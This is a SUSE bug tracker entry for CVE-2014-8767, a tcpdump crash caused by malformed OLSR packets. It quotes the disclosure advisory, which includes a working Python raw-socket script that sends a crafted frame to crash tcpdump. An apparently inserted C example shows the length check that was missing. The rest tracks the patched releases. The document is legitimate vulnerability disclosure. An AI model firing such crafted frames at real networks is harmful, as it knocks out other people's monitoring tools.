Bug 905870 (CVE-2014-8767) - VUL-0: CVE-2014-8767: tcpdump: denial of service in verbose mode using malformed OLSR payload
Summary: VUL-0: CVE-2014-8767: tcpdump: denial of service in verbose mode using malfor...
Status: RESOLVED FIXED
Alias: CVE-2014-8767
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Importance: P3 - Medium : Minor
Target Milestone: ---
Deadline: 2014-12-16
Assignee: Security Team bot
QA Contact: Security Team bot
URL:
Whiteboard: maint:released:sle11-sp1:59704 maint:...
Keywords:
Depends on:
Blocks:
 
Reported: 2014-11-18 08:32 UTC by Johannes Segitz
Modified: 2017-05-08 16:12 UTC
CC List: 2 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Description Johannes Segitz 2014-11-18 08:32:38 UTC
Date: Tue, 18 Nov 2014 06:03:16 +0100
From: Steffen Bauch <mail@steffenbauch.de>

CVE-2014-8767 tcpdump denial of service in verbose mode using
malformed OLSR payload

1. Background

tcpdump is a powerful command-line packet analyzer. It allows the user
to intercept and display TCP/IP and other packets being transmitted or
received over a network to which the computer is attached.

2. Summary Information

It was found that malformed (OLSR-based) network traffic can lead to an
application crash (denial of service) if tcpdump is monitoring the
network with verbose output enabled.

3. Technical Description

The application decoder for the OLSR protocol fails to perform
external input validation and performs insufficient checking on length
computations, leading to an unsafe decrement and underflow in the
function

olsr_print (const u_char *pptr, u_int length, int is_ipv6)

In this function msg_len is extracted from the input without
sufficient checks and sizeof(struct olsr_msg4) is subtracted from it,
which leads to an underflow of msg_tlen, which is then used to call
olsr_print_neighbor(), which will crash. In case DNS reverse lookup is
enabled, this will also lead to a large amount of invalid DNS reverse
lookups.

To reproduce, start tcpdump on a network interface

sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide the segfault message in
certain environments; see dmesg for details)

and use the following Python program to generate a frame on the
network (might also need sudo):

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW

# Raw packet socket bound to the loopback interface (needs root).
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

# Ethernet/IPv4/UDP frame carrying the malformed OLSR payload, as one
# literal (the bytes literal works on both Python 2 and Python 3).
olsr_frame = b"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"

s.send(olsr_frame)

4. Affected versions
Affected versions are 3.9.6 through 4.6.2

5. Fix
The problem is fixed in the upcoming version tcpdump 4.7.0

So SLE 11, 12 and all openSUSE variants
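The length underflow described in section 3 of the advisory, shown as an added C example that is not tcpdump's code and not part of the original report: a 12-byte OLSR message header (the RFC 3626 layout) is read from a constructed buffer, once with the unchecked subtraction the advisory describes and once with the range check a hardened decoder needs before trusting a length taken from the packet. The struct, function and sample names are this example's own (struct olsr_msg_hdr stands in for tcpdump's struct olsr_msg4), and both sample headers are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* OLSR message header as laid out in RFC 3626, section 3.4 (12 bytes).
 * This struct stands in for tcpdump's struct olsr_msg4; the name is
 * this example's own. */
struct olsr_msg_hdr {
    uint8_t msg_type;
    uint8_t vtime;
    uint8_t msg_len[2];      /* big-endian, counts the header itself */
    uint8_t originator[4];
    uint8_t ttl;
    uint8_t hopcount;
    uint8_t msg_seq[2];
};

#define OLSR_MSG_HDR_LEN ((unsigned int)sizeof(struct olsr_msg_hdr))

/* Constructed sample: a header whose declared length (4) is smaller than
 * the header itself, the kind of value a malformed packet carries. */
const uint8_t sample_short_msg[12] = {
    0x02, 0x02, 0x00, 0x04, 0x0a, 0x01, 0x01, 0x68, 0x02, 0x02, 0x00, 0x01
};

/* Constructed sample: a well-formed 20-byte message (12-byte header plus
 * 8 bytes of message body). */
const uint8_t sample_ok_msg[20] = {
    0x02, 0x02, 0x00, 0x14, 0x0a, 0x01, 0x01, 0x68, 0x02, 0x02, 0x00, 0x01,
    0x0a, 0x02, 0x02, 0x02, 0x0a, 0x02, 0x02, 0x03
};

static unsigned int extract_16bits(const uint8_t *p)
{
    return ((unsigned int)p[0] << 8) | p[1];
}

/* Unchecked form, mirroring the failure the advisory describes: msg_len is
 * taken from the packet and the header size subtracted with no range check.
 * For msg_len < 12 the unsigned subtraction wraps to a huge value, which a
 * caller would then use as the amount of neighbor data to walk. */
unsigned int msg_tlen_unchecked(const uint8_t *msg)
{
    unsigned int msg_len = extract_16bits(msg + offsetof(struct olsr_msg_hdr, msg_len));
    return msg_len - OLSR_MSG_HDR_LEN;
}

/* Checked form: the declared length must cover at least the header and must
 * not exceed the bytes actually available in the capture. Returns the body
 * length, or -1 for a malformed message so the caller can stop decoding. */
long msg_tlen_checked(const uint8_t *msg, unsigned int avail)
{
    unsigned int msg_len;

    if (avail < OLSR_MSG_HDR_LEN)
        return -1;                      /* header itself is truncated */
    msg_len = extract_16bits(msg + offsetof(struct olsr_msg_hdr, msg_len));
    if (msg_len < OLSR_MSG_HDR_LEN || msg_len > avail)
        return -1;                      /* would underflow or overrun */
    return (long)(msg_len - OLSR_MSG_HDR_LEN);
}

int main(void)
{
    printf("unchecked, short msg: %u\n", msg_tlen_unchecked(sample_short_msg));
    printf("checked,   short msg: %ld\n", msg_tlen_checked(sample_short_msg, sizeof sample_short_msg));
    printf("checked,   ok msg:    %ld\n", msg_tlen_checked(sample_ok_msg, sizeof sample_ok_msg));
    printf("checked,   truncated: %ld\n", msg_tlen_checked(sample_ok_msg, 16));
    return 0;
}
```

The second check (msg_len > avail) matters as much as the first: a length that is large rather than small does not underflow, but it still lets a loop over the message body read past the captured bytes, which is the same class of defect with a different trigger.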
Comment 1 Swamp Workflow Management 2014-11-18 10:32:25 UTC
An update workflow for this issue was started.
This issue was rated as low.
Please submit fixed packages until 2014-12-16.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/59702
Comment 2 Swamp Workflow Management 2014-11-18 23:00:13 UTC
bugbot adjusting priority
Comment 3 Vítězslav Čížek 2014-12-08 16:15:01 UTC
openSUSE updates will be started once 4.7.0 is out.
Comment 5 Swamp Workflow Management 2014-12-23 18:06:06 UTC
SUSE-SU-2014:1692-1: An update that fixes two vulnerabilities is now available.

Category: security (low)
Bug References: 905870,905872
CVE References: CVE-2014-8767,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 11 SP3 for VMware (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Server 11 SP3 (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Desktop 11 SP3 (src):    tcpdump-3.9.8-1.23.1
Comment 6 Swamp Workflow Management 2014-12-29 10:05:00 UTC
SUSE-SU-2014:1723-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 12 (src):    tcpdump-4.5.1-4.1
SUSE Linux Enterprise Desktop 12 (src):    tcpdump-4.5.1-4.1
Comment 7 Vítězslav Čížek 2015-01-19 12:49:08 UTC
(In reply to Vitezslav Cizek from comment #3)
> openSUSE updates will be started once 4.7.0 is out.

JFYI, tcpdump 4.7.0 is still not released yet.
Comment 9 Bernhard Wiedemann 2015-02-06 13:00:08 UTC
This is an autogenerated message for OBS integration:
This bug (905870) was mentioned in
https://build.opensuse.org/request/show/284471 13.2+13.1 / tcpdump
Comment 10 Swamp Workflow Management 2015-02-13 15:04:51 UTC
openSUSE-SU-2015:0284-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
openSUSE 13.2 (src):    tcpdump-4.6.2-4.1
openSUSE 13.1 (src):    tcpdump-4.4.0-2.4.1
Comment 11 Victor Pereira 2015-02-13 20:32:23 UTC
released
Comment 12 Swamp Workflow Management 2017-04-26 19:09:12 UTC
SUSE-SU-2017:1110-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
Comment 13 Swamp Workflow Management 2017-05-08 16:12:47 UTC
openSUSE-SU-2017:1199-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
openSUSE Leap 42.2 (src):    libpcap-1.8.1-7.3.1, tcpdump-4.9.0-6.3.1
openSUSE Leap 42.1 (src):    libpcap-1.8.1-8.1, tcpdump-4.9.0-7.1